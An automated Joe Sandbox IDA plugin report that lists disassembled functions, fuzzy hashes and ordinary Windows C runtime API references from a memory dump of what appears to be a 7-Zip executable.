Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
Instruction ID: 1fc77c1e1da36546246d9276a30c07bde4d11ca63bc23a258904f27346f8bc6b
Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
Instruction Fuzzy Hash: 3BF0742634BD9085CA14BB32C4A572F6791F7C3F86F0554E1AF4E63715CE28C44ACA05

Function 00B8324C Relevance: 10.0, APIs: 8, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8325E
free.MSVCRT ref: 00B83268
free.MSVCRT ref: 00B83273
free.MSVCRT ref: 00B83281
free.MSVCRT ref: 00B832A8
free.MSVCRT ref: 00B832B1
free.MSVCRT ref: 00B832BF
free.MSVCRT ref: 00B832CA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
Instruction ID: 8bc2a2e6d177045ac8bb21d68d2368ba1e394b45d17251839dbfe8f73b2f7e33
Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
Instruction Fuzzy Hash: A4F0C42238BA8141CA10FF32C895B2F67A1F7C3F82B0510D1AF4E63711CE28C40ACA04

Function 00B8333D Relevance: 10.0, APIs: 8, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8334F
free.MSVCRT ref: 00B83359
free.MSVCRT ref: 00B83364
free.MSVCRT ref: 00B83372
free.MSVCRT ref: 00B83399
free.MSVCRT ref: 00B833A2
free.MSVCRT ref: 00B833B0
free.MSVCRT ref: 00B833BB

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
Instruction ID: 26ae10ae8dcbf0520e40c41bec9167e59d1b905bf7393e05a0154485052ebd90
Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
Instruction Fuzzy Hash: 24F0972234B99085CA14FB32D5A576F67A1EBC7F82B0514E1AF4E63715CE28C40ACA04

Function 00B82E29 Relevance: 10.0, APIs: 8, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B82E3B
free.MSVCRT ref: 00B82E45
free.MSVCRT ref: 00B82E50
free.MSVCRT ref: 00B82E5E
free.MSVCRT ref: 00B82E87
free.MSVCRT ref: 00B82E90
free.MSVCRT ref: 00B82E9E
free.MSVCRT ref: 00B82EA9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
Instruction ID: a3756fcd3e6edb9717d5e4f53a602031902d5f6076ad998a88991be546ae6d44
Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
Instruction Fuzzy Hash: 99F0972234B99045CA14FB32C49562F6791EBC7F82B0514E1AF4E63715CE28C40ACA04

Function 00B82EDB Relevance: 10.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B82EE3
free.MSVCRT ref: 00B82EED
free.MSVCRT ref: 00B82EF8
free.MSVCRT ref: 00B82F06
free.MSVCRT ref: 00B82F2F
free.MSVCRT ref: 00B82F38
free.MSVCRT ref: 00B82F46
free.MSVCRT ref: 00B82F51

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
Instruction ID: 5d16a8a0095fde04dee85ff731f06404086aec1046458cc5816568e1312283d0
Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
Instruction Fuzzy Hash: 8EF0426235799585CA14BB36D46562F67A0FBC7F82B0124E1AF4E73725DE28C40ACA09

Function 00B82F97 Relevance: 10.0, APIs: 8, Instructions: 38COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B82F9F
free.MSVCRT ref: 00B82FA9
free.MSVCRT ref: 00B82FB4
free.MSVCRT ref: 00B82FC2
free.MSVCRT ref: 00B82FEB
free.MSVCRT ref: 00B82FF4
free.MSVCRT ref: 00B83002
free.MSVCRT ref: 00B8300D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
Instruction ID: aa48733aa47c05b7dac3b2618aaafe2d1ff4453d894f1052fd423d3f356f9b59
Opcode Fuzzy Hash: 542bf3f330fecf80eaa0ec81e7d53865c449308f14702187d1a118dc28be755e
Instruction Fuzzy Hash: 36F0542235799485CA14BF32D46562F67A0EBC7F82B0164E1AF4E73725DE28C40ACA05

Function 00B9B310 Relevance: 10.0, APIs: 8, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

free.MSVCRT ref: 00B9B335
free.MSVCRT ref: 00B9B342
free.MSVCRT ref: 00B9B34E
free.MSVCRT ref: 00B9B358
free.MSVCRT ref: 00B9B362
free.MSVCRT ref: 00B9B36C
free.MSVCRT ref: 00B9B376
free.MSVCRT ref: 00B9B380

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$fputsmemset
String ID:
API String ID: 469995913-0
Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
Instruction ID: 43dae61f110d7b70c7dbbb04cc4edb25f8e07965e9ba23f2e265a983886ddaa1
Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
Instruction Fuzzy Hash: 6AF09C23353D4081CB10FF31D89162E23A1E7C3B69B0452E1AF6D673A9CE20C44ACA44

Function 00B76484 Relevance: 9.2, APIs: 6, Instructions: 177COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 00B764F9
free.MSVCRT ref: 00B7659C
free.MSVCRT ref: 00B76602
free.MSVCRT ref: 00B7660A
memmove.MSVCRT ref: 00B76627
free.MSVCRT ref: 00B766A6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmovewcscmp
String ID:
API String ID: 3584677832-0
Opcode ID: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
Instruction ID: 360f8aeeb57547607af4af7bd19ef14f66f675d85b44a27b9f1f5c872739016b
Opcode Fuzzy Hash: 8f07c27319cfa5f95388e6e979af598d2aca2aeda731ef0214d5af31e1e2fbd3
Instruction Fuzzy Hash: DF518E73201E8486CB20EF1AD49016D77E1F3A4B99B54C1A6DF6D4BB68DF35D98AC700

Function 00B51364 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 172COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B51558

Strings

Incorrect switch postfix:, xrefs: 00B514F8, 00B51584
Too short switch:, xrefs: 00B5148A
Unknown switch:, xrefs: 00B5142C
Multiple instances for switch:, xrefs: 00B5145B
Too long switch:, xrefs: 00B5159F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
API String ID: 1294909896-2104980125
Opcode ID: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
Instruction ID: be64f92b12f74d534ec5c964272c0e16e8113aef99d2b3cb5ef9bbd711d616bc
Opcode Fuzzy Hash: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
Instruction Fuzzy Hash: 6D51D372215590A6CF21EF28E4803AD37E1F392396F449AE1DF5A47745EB74C98DCB00

Function 00B60358 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 143COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B604EE

Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B5FF2F
Part of subcall function 00B5FEC8: free.MSVCRT ref: 00B5FFAE
Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B5FFD1
Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B5FFF7
Part of subcall function 00B5FEC8: _CxxThrowException.MSVCRT ref: 00B6002B

free.MSVCRT ref: 00B60523
_CxxThrowException.MSVCRT ref: 00B60564

Strings

Incorrect wildcard type marker, xrefs: 00B6052A
Too short switch, xrefs: 00B6050C, 00B60515

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrow$free
String ID: Incorrect wildcard type marker$Too short switch
API String ID: 3129652135-1817034180
Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
Instruction ID: ba6bacbb581c4dc209268822080be018565929f109f0eb44a8c2991a302be63e
Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
Instruction Fuzzy Hash: 3C51C2232286C485CB30EB16E4917AFBBB0F395B94F548196EF8A17B55DB3CC586CB00

Function 00B8E2F0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8E36E
free.MSVCRT ref: 00B8E3C8
free.MSVCRT ref: 00B8E44C

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

free.MSVCRT ref: 00B8E486
free.MSVCRT ref: 00B8E4E4

Strings

#, xrefs: 00B8E494

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID: #
API String ID: 1534225298-1885708031
Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
Instruction ID: be480be8004143ab372e9e80aedd920986b3a3dedcd4817df2355c668e8a8f88
Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
Instruction Fuzzy Hash: 5C516026315B8482CB61DB26E4807AE77A1F7C9B90F584291EFAE477A5DF38C849C700

Function 00B92688 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 126stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00B9273A
strlen.MSVCRT ref: 00B92749
memset.MSVCRT ref: 00B92767
strlen.MSVCRT ref: 00B927EB
memset.MSVCRT ref: 00B92811

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

, xrefs: 00B92818

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memsetstrlen$fputs
String ID:
API String ID: 2256168112-2735817509
Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
Instruction ID: 7299efb7d79196b37de4bff3a83064bda1c7285002c4eba0d949ac3e2c8f3f84
Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
Instruction Fuzzy Hash: C041C4667087C0A5CF34EB25E8913AE67E1F784BC8F4855B6DE8A07719CE78C589CB40

Function 00B59828 Relevance: 9.1, APIs: 6, Instructions: 123COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00B59898
free.MSVCRT ref: 00B599E7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLastfree
String ID:
API String ID: 2167247754-0
Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
Instruction ID: a9c2a571b0bbf0d2d38903707ef1d96ee60a0af96fb4dc5a8939e0816f59cca3
Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
Instruction Fuzzy Hash: 8141B922219680C5DA20EB14E4913AEB3E1F7D2761F5012E6EFDD83AD5DF28C94ECB04

Function 00B56A04 Relevance: 9.1, APIs: 6, Instructions: 74fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00B56A42
MoveFileW.KERNEL32 ref: 00B56AA6
free.MSVCRT ref: 00B56AB6
free.MSVCRT ref: 00B56AC1
free.MSVCRT ref: 00B56ACF
free.MSVCRT ref: 00B56ADA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$FileMove
String ID:
API String ID: 288606353-0
Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
Instruction ID: 2e311e304759a7686ca8e403c7d1d5447314e35939a72e90f1fd78e26be671ab
Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
Instruction Fuzzy Hash: 3311961334594045CA20EF25E85076B77A0DBC3BD2F8852E1BF6AA7765DE29CC8ECA00

Function 00B57B70 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00B5794C: FindClose.KERNELBASE ref: 00B5795E

SetLastError.KERNEL32 ref: 00B57BAA
SetLastError.KERNEL32 ref: 00B57BB9
FindFirstStreamW.KERNELBASE ref: 00B57BDB
GetLastError.KERNEL32 ref: 00B57BEA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLast$Find$CloseFirstStream
String ID:
API String ID: 4071060300-0
Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
Instruction ID: d14e444c2776221517db9027e0731cefbd59eff7cd3e4ddaca6e397c3b734ea1
Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
Instruction Fuzzy Hash: 5D219522748B4086DA20AB25F45436933E1FB8A776F5453E1DEBA437E5DF38C94DC601

Function 00B9CCF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9CD1C
fputs.MSVCRT ref: 00B9CD31
free.MSVCRT ref: 00B9CDDC
free.MSVCRT ref: 00B9CE23

Strings

(Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 00B9CD2A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputsfree
String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
API String ID: 2581285248-171671738
Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
Instruction ID: 8b442c650a373b5536fd1db01fc88e49a6e1a25f8fef7e8406a817fbd89a59da
Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
Instruction Fuzzy Hash: 0F31B32220894497EF309B14D8A537A2FE1E7853E5F4851B2EF4B073AACB5CDCA5D701

Function 00B511B8 Relevance: 8.8, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B51215
free.MSVCRT ref: 00B5121D
free.MSVCRT ref: 00B512AA
free.MSVCRT ref: 00B512B5
free.MSVCRT ref: 00B512C4
free.MSVCRT ref: 00B512CF
free.MSVCRT ref: 00B512DA

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
Instruction ID: 2fedd4228e07c213332ac0863769e5d8f62e60c214fad444ab01f790b5747ac5
Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
Instruction Fuzzy Hash: EB21A42331694051CA61EF24E85135EA7A0EBC2BD2F4452E1BF5E577A9DF29CA4ECB00

Function 00B964C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

fputs.MSVCRT ref: 00B964EB
fputs.MSVCRT ref: 00B964FB

Part of subcall function 00B96460: fputs.MSVCRT ref: 00B964B3

fputc.MSVCRT ref: 00B96534
fputs.MSVCRT ref: 00B9659B

Strings

Time =, xrefs: 00B964F4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$fputc
String ID: Time =
API String ID: 1185151155-458291097
Opcode ID: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
Instruction ID: bd44192d7c2fa132f8c6e32fba5c9d3fb145d792cdb8f27c5dc775abf31676af
Opcode Fuzzy Hash: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
Instruction Fuzzy Hash: BB219095340A1586EA08AF1AE89136A6352E7A8FC4F08E035DE1A477A9DF3CC896C340

Function 00B8F69C Relevance: 8.8, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B8F6C5
memmove.MSVCRT ref: 00B8F70E
free.MSVCRT ref: 00B8F727
free.MSVCRT ref: 00B8F72F
memmove.MSVCRT ref: 00B8F74B
LeaveCriticalSection.KERNEL32 ref: 00B8F757
_CxxThrowException.MSVCRT ref: 00B8F773

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
String ID:
API String ID: 202075352-0
Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
Instruction ID: 8bdc9838de30910cdc0bf917e8c16ad2e0cccb31470001a84c76c317fb8e402c
Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
Instruction Fuzzy Hash: 63219D77221A5587DB60EF2AD44166C7360F345BA5F901366AE3A176A8DF25C886CB00

Function 00B7D078 Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7D0AB
free.MSVCRT ref: 00B7D0B8
free.MSVCRT ref: 00B7D0EB
free.MSVCRT ref: 00B7D0F3
free.MSVCRT ref: 00B7D103
free.MSVCRT ref: 00B7D10D
free.MSVCRT ref: 00B7D117
